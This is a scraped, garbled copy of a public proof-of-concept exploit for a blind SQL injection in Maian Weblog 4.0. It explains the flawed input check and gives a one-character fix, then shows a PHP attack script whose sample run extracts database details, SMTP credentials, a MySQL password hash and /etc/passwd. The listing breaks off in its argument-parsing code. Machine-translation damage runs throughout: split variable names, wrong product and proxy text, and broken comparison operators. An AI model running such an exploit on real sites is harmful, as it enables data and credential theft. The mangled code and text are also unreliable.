Maian weblog & amp; lt; = v4.0 SQL blind injection vulnerability and repair

Maian weblog is a free blog system. If maian weblog is earlier than index. php In analyticdb 4.0, the SQL injection vulnerability may cause sensitive information leakage.

[+] Info:
~~~~~~~~~
Maian weblog <= v4.0 remote blind SQL injection exploit

[+] Poc:
~~~~~~~~~

View sourceprint? 001 <? Php

002 /*

003 maian weblog <= v4.0 Remote Blind SQL Injection Exploit

004 vendor: http://www.maianscriptworld.co.uk/

005 Thanks to Johannes Dahse: http://bit.ly/dpQXMK

006

007 Explanation:

008 Lines 335-341 of the index. php we see this if statement that concerns

009 our variable $ B _post.

010

011 // Check month and year vars...

012 // If they don't equal 0, are they numeric ?..

013 if ($ B _post = 0 &&! Ctype_digit ($ B _post ))

014 {

015 header ("Location: index. php ");

016 exit;

017}

018

019 This if statement is suppose to prevent the SQL Injection vulnerability.

020 However the logic implimented is incorrect, as there will never be a situation

021 where the $ B _post variable that we control will ever be a 0 and a string value.

022

023 So a simple fix to remediate this issue becomes clear, instead of an &,

024 author was suppose to use an |. o. O

025

026 Further down in the index. php page on lines 348-361, we see the location of

027 actual vulnerable code.

028

029 $ q_blog = mysql_query ("SELECT * FROM". $ database [prefix]. "blogs

030 WHERE id = $ B _post

031 LIMIT 1

032 ") or die (mysql_error ());

033 $ BLOG = mysql_fetch_object ($ q_blog );

034

035 // At this point, lets see if the last query fetched anything ..

036 // If it didn't, blog id is invalid. Might be someone bookmarked an old link ..

037 // If no data, redirect to homepage ..

038 if (mysql_num_rows ($ q_blog) = 0)

039 {

040 header ("Location: index. php ");

041 exit;

042}

043

044 The page redirects after the query is executed. This way you probably wont spot

045 bug in your browser from a blackbox view :). No urldecode () so we cant bypass

046 magic_quotes_gpc and the admin credentials are not stored in the database. doh.

047

048 Using <or> wocould make the PoC a little more efficient, but oh well: 0)

049 Assuming some stars are aligned, the PoC will make well over 11,000 requests...

050 [mr_me @ pluto maian_weblog] $ php PoC. php-t 192.168.56.101-d/maian_weblog/-p 127.0.0.1: 8080

051

052 -------------------------------------------------------

053 maian weblog <= v4.0 Remote Blind SQL Injection Explo! T

054 by mr_me-https://net-ninja.net/

055 -------------------------------------------------------

056

057 (+) Setting the proxy to Fig: 8080

058 (+) Getting basic database information

059 (+) Database version-> 5.1.41-3ubuntu12. 9

060 (+) Database name-> maian_weblog

061 (+) Database user-> root @ localhost

062 (+) SMTP details found!

063 (+) Getting SMTP host: user: pass-> localhost: maianmail: password

064 (+) Access to MySQL database successful, dumping hash!

065 (+) MySQL user: pass-> root: * EE4E2773D7530819563F0DC6FCE27446A51C9413

066 (!) Access to load_file (), wanna play? (Y/n): y

067

068 (+) Please enter the file (q to quit):/etc/shadow

069 (-) File doesnt exist/no access.

070 (+) Please enter the file (q to quit):/etc/passwd

071 (!) Dumping the/etc/passwd file, hold onto your knickers!

072 root: x: 0: 0: root:/bin/bash

073 daemon: x: 1: 1: daemon :......

074 */

075

076 print_r ("

077 -------------------------------------------------------

078 maian weblog <= v4.0 Remote Blind SQL Injection Explo! T

079 by mr_me-https://net-ninja.net/

080 -------------------------------------------------------

081 ");

082

083 if ($ argc <3 ){

084 print_r ("

085 -----------------------------------------------------------------------------

086 Usage: php ". $ argv [0]."-t

087 host: target server (ip/hostname)

088 path: directory path to wordpress

089 Options:

090-p [ip: port]: specify a proxy

091 Example:

092 php ". $ argv [0]."-t 192.168.1.5-d/webapps/wp/-p 127.0.0.1: 8080

093 php ". $ argv [0]."-t 192.168.1.5-d/webapps/wp/

094 -----------------------------------------------------------------------------

095 "); die ;}

096

097 error_reporting (7 );

098 ini_set ("max_execution_time", 0 );

099 ini_set ("default_socket_timeout", 5 );

100

101 $ proxy_regex = "(d {1, 3}. d {1, 3}. d {1, 3}. d {1, 3 })";

102

103 function setArgs ($ argv ){

104 $ _ ARG = array ();

105 foreach ($ argv as $ arg ){

106 if (ereg ("-- ([^ =] +) = (. *)", $ arg, $ reg )){

107 $ _ ARG [$ reg [1] = $ reg [2];

108} elseif (ereg ("^-([a-zA-Z0-9])", $ arg, $ reg )){

109 $ _ ARG [$ reg [1] = "true ";

110} else {

111 $ _ ARG ["input"] [] = $ arg;

112}

113